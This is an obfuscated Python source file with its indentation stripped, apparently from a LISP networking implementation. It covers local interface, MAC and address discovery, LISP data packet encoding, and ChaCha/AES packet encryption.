if 18 - 18: Oo0Ooo / O0 + iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
def lisp_get_local_interfaces ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
II1i = lisp_interface ( OoO0o0OOOO )
II1i . add_interface ( )
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
return
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
def lisp_get_loopback_address ( ) :
for IiiIIi1 in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( IiiIIi1 [ "peer" ] == "127.0.0.1" ) : continue
return ( IiiIIi1 [ "peer" ] )
if 40 - 40: o0oOOo0O0Ooo + I11i
return ( None )
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
def lisp_is_mac_string ( mac_str ) :
Ii = mac_str . split ( "/" )
if ( len ( Ii ) == 2 ) : mac_str = Ii [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
def lisp_get_local_macs ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
OooOOOoOoo0O0 = OoO0o0OOOO . replace ( ":" , "" )
OooOOOoOoo0O0 = OoO0o0OOOO . replace ( "-" , "" )
if ( OooOOOoOoo0O0 . isalnum ( ) == False ) : continue
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
if 37 - 37: iII111i
if 33 - 33: OoO0O00 - O0 - OoO0O00
if 94 - 94: IiII * I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - o0oOOo0O0Ooo
try :
I1I1i = netifaces . ifaddresses ( OoO0o0OOOO )
except :
continue
if 45 - 45: OOooOOo
if ( I1I1i . has_key ( netifaces . AF_LINK ) == False ) : continue
Ii = I1I1i [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
Ii = Ii . replace ( ":" , "" )
if 25 - 25: OOooOOo % O0
if 44 - 44: I1Ii111 . Ii1I * II111iiii / IiII + iIii1I11I1II1
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
if ( len ( Ii ) < 12 ) : continue
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if ( lisp_mymacs . has_key ( Ii ) == False ) : lisp_mymacs [ Ii ] = [ ]
lisp_mymacs [ Ii ] . append ( OoO0o0OOOO )
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
def lisp_get_local_rloc ( ) :
II1IIiiI1 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
if 58 - 58: O0
II1IIiiI1 = II1IIiiI1 . split ( "\n" ) [ 0 ]
OoO0o0OOOO = II1IIiiI1 . split ( ) [ - 1 ]
if 91 - 91: iII111i / I1ii11iIi11i . iII111i - o0oOOo0O0Ooo + I1ii11iIi11i
IiiIIi1 = ""
O00 = lisp_is_macos ( )
if ( O00 ) :
II1IIiiI1 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OoO0o0OOOO ) )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OoO0o0OOOO )
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if ( II1IIiiI1 == "" ) :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "global lo"'
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if 86 - 86: ooOoO0o
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 51 - 51: OoO0O00 - i11iIiiIii * I1IiiI
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
IiiIIi1 = ""
II1IIiiI1 = II1IIiiI1 . split ( "\n" )
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
for oOOo0ooO0 in II1IIiiI1 :
OO0o = oOOo0ooO0 . split ( ) [ 1 ]
if ( O00 == False ) : OO0o = OO0o . split ( "/" ) [ 0 ]
ii1i1II11II1i = lisp_address ( LISP_AFI_IPV4 , OO0o , 32 , 0 )
return ( ii1i1II11II1i )
if 95 - 95: I11i + o0oOOo0O0Ooo * I1ii11iIi11i
return ( lisp_address ( LISP_AFI_IPV4 , IiiIIi1 , 32 , 0 ) )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
if 38 - 38: I11i . I11i * oO0o / OoooooooOO % ooOoO0o
if 80 - 80: OoO0O00 / IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 22 - 22: oO0o * iII111i
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
if 75 - 75: OoooooooOO . OOooOOo + OoO0O00 / Ii1I - I1IiiI % Ii1I
if 89 - 89: iII111i * iIii1I11I1II1 + i11iIiiIii . OoooooooOO
O0O0 = None
ooo = 1
oO0oo = os . getenv ( "LISP_ADDR_SELECT" )
if ( oO0oo != None and oO0oo != "" ) :
oO0oo = oO0oo . split ( ":" )
if ( len ( oO0oo ) == 2 ) :
O0O0 = oO0oo [ 0 ]
ooo = oO0oo [ 1 ]
else :
if ( oO0oo [ 0 ] . isdigit ( ) ) :
ooo = oO0oo [ 0 ]
else :
O0O0 = oO0oo [ 0 ]
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
ooo = 1 if ( ooo == "" ) else int ( ooo )
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
ooOOo = [ None , None , None ]
i1iii1IiiiI1i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IIIiI1i1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
IIi11iII11i1 = None
if 5 - 5: II111iiii - IiII
for OoO0o0OOOO in netifaces . interfaces ( ) :
if ( O0O0 != None and O0O0 != OoO0o0OOOO ) : continue
IIiiI = netifaces . ifaddresses ( OoO0o0OOOO )
if ( IIiiI == { } ) : continue
if 86 - 86: IiII * I11i + O0 * I1Ii111 + i11iIiiIii - I1ii11iIi11i
if 70 - 70: i11iIiiIii
if 57 - 57: I11i % OOooOOo + ooOoO0o * Ii1I . Oo0Ooo
if 78 - 78: OoooooooOO / i1IIi . OOooOOo
IIi11iII11i1 = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 88 - 88: I11i + I1IiiI - I11i / OoooooooOO - i11iIiiIii
if 24 - 24: iIii1I11I1II1
if 89 - 89: Ii1I / i1IIi - o0oOOo0O0Ooo % I1IiiI . Oo0Ooo - O0
if 71 - 71: OoO0O00 % I1IiiI - iII111i . iII111i
if ( IIiiI . has_key ( netifaces . AF_INET ) ) :
IIi1 = IIiiI [ netifaces . AF_INET ]
I1I1 = 0
for IiiIIi1 in IIi1 :
i1iii1IiiiI1i1 . store_address ( IiiIIi1 [ "addr" ] )
if ( i1iii1IiiiI1i1 . is_ipv4_loopback ( ) ) : continue
if ( i1iii1IiiiI1i1 . is_ipv4_link_local ( ) ) : continue
if ( i1iii1IiiiI1i1 . address == 0 ) : continue
I1I1 += 1
i1iii1IiiiI1i1 . instance_id = IIi11iII11i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( i1iii1IiiiI1i1 , False ) ) : continue
ooOOo [ 0 ] = i1iii1IiiiI1i1
if ( I1I1 == ooo ) : break
if 78 - 78: I11i . OOooOOo + oO0o * iII111i - i1IIi
if 27 - 27: Ii1I % i1IIi . Oo0Ooo % I1Ii111
if ( IIiiI . has_key ( netifaces . AF_INET6 ) ) :
OoO0oO = IIiiI [ netifaces . AF_INET6 ]
I1I1 = 0
for IiiIIi1 in OoO0oO :
oo0o00OO = IiiIIi1 [ "addr" ]
IIIiI1i1 . store_address ( oo0o00OO )
if ( IIIiI1i1 . is_ipv6_string_link_local ( oo0o00OO ) ) : continue
if ( IIIiI1i1 . is_ipv6_loopback ( ) ) : continue
I1I1 += 1
IIIiI1i1 . instance_id = IIi11iII11i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( IIIiI1i1 , False ) ) : continue
ooOOo [ 1 ] = IIIiI1i1
if ( I1I1 == ooo ) : break
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
if 96 - 96: I11i
if ( ooOOo [ 0 ] == None ) : continue
if 34 - 34: OoOoOO00 / OoO0O00 - I1IiiI . O0 . OOooOOo
ooOOo [ 2 ] = OoO0o0OOOO
break
if 63 - 63: iII111i
if 11 - 11: iII111i - iIii1I11I1II1
ooOo0O0 = ooOOo [ 0 ] . print_address_no_iid ( ) if ooOOo [ 0 ] else "none"
ooo0 = ooOOo [ 1 ] . print_address_no_iid ( ) if ooOOo [ 1 ] else "none"
OoO0o0OOOO = ooOOo [ 2 ] if ooOOo [ 2 ] else "none"
if 36 - 36: I1Ii111 . IiII * OoooooooOO - o0oOOo0O0Ooo
O0O0 = " (user selected)" if O0O0 != None else ""
if 60 - 60: OOooOOo . iII111i / iIii1I11I1II1 + OOooOOo * I1Ii111
ooOo0O0 = red ( ooOo0O0 , False )
ooo0 = red ( ooo0 , False )
OoO0o0OOOO = bold ( OoO0o0OOOO , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( ooOo0O0 , ooo0 , OoO0o0OOOO , O0O0 , IIi11iII11i1 ) )
if 82 - 82: i11iIiiIii . iIii1I11I1II1 * I1IiiI - I11i + Ii1I
if 48 - 48: I1ii11iIi11i
lisp_myrlocs = ooOOo
return ( ( ooOOo [ 0 ] != None ) )
if 96 - 96: ooOoO0o . OoooooooOO
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
if 88 - 88: Oo0Ooo
def lisp_get_all_addresses ( ) :
i1ii111i = [ ]
for II1i in netifaces . interfaces ( ) :
try : i1ii1i1Ii11 = netifaces . ifaddresses ( II1i )
except : continue
if 88 - 88: I1Ii111 % I11i - OoooooooOO + ooOoO0o
if ( i1ii1i1Ii11 . has_key ( netifaces . AF_INET ) ) :
for IiiIIi1 in i1ii1i1Ii11 [ netifaces . AF_INET ] :
OO0o = IiiIIi1 [ "addr" ]
if ( OO0o . find ( "127.0.0.1" ) != - 1 ) : continue
i1ii111i . append ( OO0o )
if 53 - 53: i1IIi . i1IIi - I11i / iII111i - OoOoOO00 % I1IiiI
if 65 - 65: iII111i . OoooooooOO - O0 . iII111i - i11iIiiIii
if ( i1ii1i1Ii11 . has_key ( netifaces . AF_INET6 ) ) :
for IiiIIi1 in i1ii1i1Ii11 [ netifaces . AF_INET6 ] :
OO0o = IiiIIi1 [ "addr" ]
if ( OO0o == "::1" ) : continue
if ( OO0o [ 0 : 5 ] == "fe80:" ) : continue
i1ii111i . append ( OO0o )
if 29 - 29: I1ii11iIi11i . I1IiiI % oO0o - i11iIiiIii
if 27 - 27: I1ii11iIi11i - i11iIiiIii % I1Ii111 / Oo0Ooo . Oo0Ooo / OoooooooOO
if 76 - 76: I11i * OoO0O00 . iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
return ( i1ii111i )
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
if 15 - 15: I1ii11iIi11i
def lisp_get_all_multicast_rles ( ) :
I11iI1 = [ ]
II1IIiiI1 = commands . getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( II1IIiiI1 == "" ) : return ( I11iI1 )
if 96 - 96: o0oOOo0O0Ooo % IiII / OOooOOo
Oo0o0ooOoO = II1IIiiI1 . split ( "\n" )
for oOOo0ooO0 in Oo0o0ooOoO :
if ( oOOo0ooO0 [ 0 ] == "#" ) : continue
iI1Ii11 = oOOo0ooO0 . split ( "rle-address = " ) [ 1 ]
Ooo0 = int ( iI1Ii11 . split ( "." ) [ 0 ] )
if ( Ooo0 >= 224 and Ooo0 < 240 ) : I11iI1 . append ( iI1Ii11 )
if 49 - 49: II111iiii + OoooooooOO . oO0o + i11iIiiIii / oO0o
return ( I11iI1 )
if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
if 60 - 60: OOooOOo
if 62 - 62: I1Ii111 * I11i
if 74 - 74: OoOoOO00 . iIii1I11I1II1
class lisp_packet ( ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 87 - 87: ooOoO0o
if 41 - 41: OoOoOO00 . iIii1I11I1II1 % ooOoO0o + O0
def encode ( self , nonce ) :
if 22 - 22: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o + I1ii11iIi11i * iII111i . i11iIiiIii
if 90 - 90: OOooOOo * OoOoOO00 - Oo0Ooo + o0oOOo0O0Ooo
if 53 - 53: OoooooooOO . OoooooooOO + o0oOOo0O0Ooo - iII111i + OOooOOo
if 44 - 44: I1Ii111 - IiII
if 100 - 100: oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
if ( self . outer_source . is_null ( ) ) : return ( None )
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
self . lisp_header . instance_id ( self . inner_dest . instance_id )
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
self . lisp_header . key_id ( 0 )
iiII1IIii1i1 = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and iiII1IIii1i1 == False ) :
oo0o00OO = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if 38 - 38: iII111i * OoooooooOO
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) :
iIi11III [ 1 ] . use_count += 1
IiiiIi1iiii11 , iIIi1IIIii11i = self . encrypt ( iIi11III [ 1 ] , oo0o00OO )
if ( iIIi1IIIii11i ) : self . packet = IiiiIi1iiii11
if 40 - 40: I1IiiI % ooOoO0o % IiII + OoO0O00
if 75 - 75: oO0o - I1ii11iIi11i + oO0o + OoooooooOO . i11iIiiIii
if 52 - 52: iII111i / ooOoO0o - i11iIiiIii + OoooooooOO
if 33 - 33: O0 + Oo0Ooo - iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
if 92 - 92: OoO0O00 * IiII
else :
self . udp_sport = lisp_crypto_ephem_port
if 92 - 92: oO0o
else :
self . udp_sport = LISP_DATA_PORT
if 7 - 7: iII111i
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if ( self . outer_version == 4 ) :
oo0O = socket . htons ( self . udp_sport )
O0o0o0ooO0ooo = socket . htons ( self . udp_dport )
else :
oo0O = self . udp_sport
O0o0o0ooO0ooo = self . udp_dport
if 47 - 47: IiII
if 76 - 76: OoO0O00 * iIii1I11I1II1 + I1ii11iIi11i - ooOoO0o - I11i / i1IIi
O0o0o0ooO0ooo = socket . htons ( self . udp_dport ) if self . outer_version == 4 else self . udp_dport
if 27 - 27: I1ii11iIi11i . IiII
if 66 - 66: O0 / O0 * i1IIi . OoooooooOO % iIii1I11I1II1
o0oOo00 = struct . pack ( "HHHH" , oo0O , O0o0o0ooO0ooo , socket . htons ( self . udp_length ) ,
self . udp_checksum )
if 21 - 21: IiII - I1IiiI % OoooooooOO + o0oOOo0O0Ooo
if 92 - 92: ooOoO0o + IiII
if 52 - 52: II111iiii / I1IiiI . oO0o * IiII . I11i
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
iI1 = self . lisp_header . encode ( )
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
if 50 - 50: oO0o % i1IIi * O0
if 4 - 4: iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
if ( self . outer_version == 4 ) :
IiI = socket . htons ( self . udp_length + 20 )
ii11I = socket . htons ( 0x4000 )
Ooo0O00 = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , IiI , 0xdfdf ,
ii11I , self . outer_ttl , 17 , 0 )
Ooo0O00 += self . outer_source . pack_address ( )
Ooo0O00 += self . outer_dest . pack_address ( )
Ooo0O00 = lisp_ip_checksum ( Ooo0O00 )
elif ( self . outer_version == 6 ) :
Ooo0O00 = ""
if 53 - 53: O0 . I1IiiI
if 74 - 74: ooOoO0o % OoOoOO00 / Oo0Ooo
if 2 - 2: IiII % IiII % I1Ii111
if 60 - 60: OOooOOo
if 73 - 73: ooOoO0o
if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
else :
return ( None )
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
self . packet = Ooo0O00 + o0oOo00 + iI1 + self . packet
return ( self )
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
def cipher_pad ( self , packet ) :
IiiI1iii1iIiiI = len ( packet )
if ( ( IiiI1iii1iIiiI % 16 ) != 0 ) :
II1iiiiI1 = ( ( IiiI1iii1iIiiI / 16 ) + 1 ) * 16
packet = packet . ljust ( II1iiiiI1 )
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
return ( packet )
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
IiiiIi1iiii11 = self . cipher_pad ( self . packet )
iiI1iiIiiiI1I = key . get_iv ( )
if 6 - 6: OoO0O00
i1 = lisp_get_timestamp ( )
OO000OOOo0Oo = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
Oo00O0O = chacha . ChaCha ( key . encrypt_key , iiI1iiIiiiI1I ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
oOoOOoo = binascii . unhexlify ( key . encrypt_key )
try :
Oo00O0o0O = AES . new ( oOoOOoo , AES . MODE_GCM , iiI1iiIiiiI1I )
Oo00O0O = Oo00O0o0O . encrypt
OO000OOOo0Oo = Oo00O0o0O . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
if 86 - 86: I11i + O0 + Oo0Ooo - I11i
else :
oOoOOoo = binascii . unhexlify ( key . encrypt_key )
Oo00O0O = AES . new ( oOoOOoo , AES . MODE_CBC , iiI1iiIiiiI1I ) . encrypt
if 34 - 34: II111iiii % I1IiiI % I1Ii111 + Oo0Ooo - OoOoOO00
if 66 - 66: Ii1I * iIii1I11I1II1 - ooOoO0o / I1IiiI
o0 = Oo00O0O ( IiiiIi1iiii11 )
if 16 - 16: iIii1I11I1II1
if ( o0 == None ) : return ( [ self . packet , False ] )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 94 - 94: ooOoO0o % I11i % i1IIi
if 90 - 90: Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
if 55 - 55: OoooooooOO
if ( OO000OOOo0Oo != None ) : o0 += OO000OOOo0Oo ( )
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
self . lisp_header . key_id ( key . key_id )
iI1 = self . lisp_header . encode ( )
if 97 - 97: I1ii11iIi11i
OOo0oO0o = key . do_icv ( iI1 + iiI1iiIiiiI1I + o0 , iiI1iiIiiiI1I )
if 3 - 3: I1IiiI / iIii1I11I1II1 % o0oOOo0O0Ooo
O0oo0000o = 4 if ( key . do_poly ) else 8
if 99 - 99: oO0o - I1ii11iIi11i . II111iiii * i11iIiiIii . OOooOOo - OoO0O00
Iii11I111Ii11 = bold ( "Encrypt" , False )
iI1oOoo = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
o00O0o00oo = "poly" if key . do_poly else "sha256"
o00O0o00oo = bold ( o00O0o00oo , False )
iIiiII = "ICV({}): 0x{}...{}" . format ( o00O0o00oo , OOo0oO0o [ 0 : O0oo0000o ] , OOo0oO0o [ - O0oo0000o : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( Iii11I111Ii11 , key . key_id , addr_str , iIiiII , iI1oOoo , i1 ) )
if 13 - 13: II111iiii
if 55 - 55: Oo0Ooo % i1IIi * I11i
OOo0oO0o = int ( OOo0oO0o , 16 )
if ( key . do_poly ) :
OOOo0 = byte_swap_64 ( ( OOo0oO0o >> 64 ) & LISP_8_64_MASK )
o0Oooo0o0oO0 = byte_swap_64 ( OOo0oO0o & LISP_8_64_MASK )
OOo0oO0o = struct . pack ( "QQ" , OOOo0 , o0Oooo0o0oO0 )
else :
OOOo0 = byte_swap_64 ( ( OOo0oO0o >> 96 ) & LISP_8_64_MASK )
o0Oooo0o0oO0 = byte_swap_64 ( ( OOo0oO0o >> 32 ) & LISP_8_64_MASK )
IIIiIiiI1i = socket . htonl ( OOo0oO0o & 0xffffffff )
OOo0oO0o = struct . pack ( "QQI" , OOOo0 , o0Oooo0o0oO0 , IIIiIiiI1i )
if 28 - 28: IiII + i11iIiiIii + OoooooooOO / OoO0O00
if 6 - 6: I1IiiI - i11iIiiIii
return ( [ iiI1iiIiiiI1I + o0 + OOo0oO0o , True ] )
